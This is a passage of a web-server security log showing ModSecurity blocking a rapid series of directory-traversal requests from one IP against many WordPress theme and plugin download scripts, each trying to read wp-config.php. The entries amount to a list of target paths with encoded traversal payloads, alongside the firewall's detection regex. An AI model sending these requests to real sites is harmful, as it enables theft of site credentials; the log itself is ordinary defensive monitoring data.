"OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/beach_apollo/download.php"] [unique_id "ZEeeod-GjcOLRjW9Sa4WNgAAAJM"] [Tue Apr 25 04:34:26.065625 2023] [:error] [pid 15580:tid 140446990800640] [client 37.120.213.169:41744] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php"] [unique_id "ZEeeot-GjcOLRjW9Sa4WNwAAAJQ"] [Tue Apr 25 04:34:26.191749 2023] [:error] [pid 15889:tid 140447024371456] [client 37.120.213.169:41746] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/newspro2891/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/newspro2891/download.php"] [unique_id "ZEeeol4G6tVEc6w5Us7gpgAAANA"] [Tue Apr 25 04:34:26.317679 2023] [:error] [pid 15580:tid 140447203165952] [client 37.120.213.169:41748] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/draisabeladavid/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/draisabeladavid/download.php"] [unique_id "ZEeeot-GjcOLRjW9Sa4WOAAAAIM"] [Tue Apr 25 04:34:26.443647 2023] [:error] [pid 15578:tid 140447211558656] [client 37.120.213.169:41750] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/hfr/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/hfr/download.php"] [unique_id "ZEeeoj754oNYNW-15_AYgQAAAAI"] [Tue Apr 25 04:34:26.578570 2023] [:error] [pid 15889:tid 140447091513088] [client 37.120.213.169:41752] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/storepress/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/storepress/framework/utilities/download/getfile.php"] [unique_id "ZEeeol4G6tVEc6w5Us7gpwAAAMg"] [Tue Apr 25 04:34:26.706877 2023] [:error] [pid 15889:tid 140447041156864] [client 37.120.213.169:41754] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php"] [unique_id "ZEeeol4G6tVEc6w5Us7gqAAAAM4"] [Tue Apr 25 04:34:26.832521 2023] [:error] [pid 15889:tid 140447049549568] [client 37.120.213.169:41756] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/yaml-green/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/yaml-green/download.php"] [unique_id "ZEeeol4G6tVEc6w5Us7gqQAAAM0"] [Tue Apr 25 04:34:26.958340 2023] [:error] [pid 15889:tid 140446990800640] [client 37.120.213.169:41758] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/itchyrobot_parent/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/itchyrobot_parent/download.php"] [unique_id "ZEeeol4G6tVEc6w5Us7gqgAAANQ"] [Tue Apr 25 04:34:27.084204 2023] [:error] [pid 15889:tid 140446957229824] [client 37.120.213.169:41762] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mh-magazine-lite/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mh-magazine-lite/down.php"] [unique_id "ZEeeo14G6tVEc6w5Us7grAAAANg"] [Tue Apr 25 04:34:27.209823 2023] [:error] [pid 15579:tid 140447032764160] [client 37.120.213.169:41764] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/seacad/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/seacad/inc/download.php"] [unique_id "ZEeeoyIlOCjnXl5KlpegfQAAAE8"] [Tue Apr 25 04:34:27.340802 2023] [:error] [pid 15889:tid 140446965622528] [client 37.120.213.169:41768] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/theme-wpaitaliadigitale-full/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/theme-wpaitaliadigitale-full/down.php"] [unique_id "ZEeeo14G6tVEc6w5Us7grgAAANc"] [Tue Apr 25 04:34:27.477351 2023] [:error] [pid 15889:tid 140447186380544] [client 37.120.213.169:41770] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/jamesaltucher/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/jamesaltucher/download.php"] [unique_id "ZEeeo14G6tVEc6w5Us7grwAAAMU"] [Tue Apr 25 04:34:27.619118 2023] [:error] [pid 15889:tid 140447108298496] [client 37.120.213.169:41772] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/fluidracountry/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/fluidracountry/download.php"] [unique_id "ZEeeo14G6tVEc6w5Us7gsAAAAMY"] [Tue Apr 25 04:34:27.745495 2023] [:error] [pid 15580:tid 140446982407936] [client 37.120.213.169:41778] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/responsive-visual/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/responsive-visual/includes/download.php"] [unique_id "ZEeeo9-GjcOLRjW9Sa4WOQAAAJU"] [Tue Apr 25 04:34:27.892453 2023] [:error] [pid 15889:tid 140447211558656] [client 37.120.213.169:41780] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/quark/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/quark/download.php"] [unique_id "ZEeeo14G6tVEc6w5Us7gsgAAAMI"] [Tue Apr 25 04:34:28.040610 2023] [:error] [pid 15579:tid 140447041156864] [client 37.120.213.169:41782] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/todays/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/todays/download.php"] [unique_id "ZEeepCIlOCjnXl5KlpegfgAAAE4"] [Tue Apr 25 04:34:28.173205 2023] [:error] [pid 15889:tid 140446999193344] [client 37.120.213.169:41784] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/banftheme/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/banftheme/download.php"] [unique_id "ZEeepF4G6tVEc6w5Us7gswAAANM"] [Tue Apr 25 04:34:28.299583 2023] [:error] [pid 15889:tid 140447066334976] [client 37.120.213.169:41786] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/placid/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/placid/download.php"] [unique_id "ZEeepF4G6tVEc6w5Us7gtAAAAMs"] [Tue Apr 25 04:34:28.439717 2023] [:error] [pid 15580:tid 140447186380544] [client 37.120.213.169:41788] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/metz/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/metz/download.php"] [unique_id "ZEeepN-GjcOLRjW9Sa4WOgAAAIU"] [Tue Apr 25 04:34:28.587593 2023] [:error] [pid 15578:tid 140447194773248] [client 37.120.213.169:41790] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/caledobio/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/caledobio/framework/utilities/download/getfile.php"] [unique_id "ZEeepD754oNYNW-15_AYggAAAAQ"] [Tue Apr 25 04:34:28.963965 2023] [:error] [pid 15580:tid 140447099905792] [client 37.120.213.169:41792] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mingle/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mingle/framework/utilities/download/getfile.php"] [unique_id "ZEeepN-GjcOLRjW9Sa4WOwAAAIc"] [Tue Apr 25 04:34:29.089396 2023] [:error] [pid 15580:tid 140447041156864] [client 37.120.213.169:41794] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/accesspress-store/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/accesspress-store/download.php"] [unique_id "ZEeepd-GjcOLRjW9Sa4WPAAAAI4"] [Tue Apr 25 04:34:29.216602 2023] [:error] [pid 15580:tid 140447211558656] [client 37.120.213.169:41796] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match 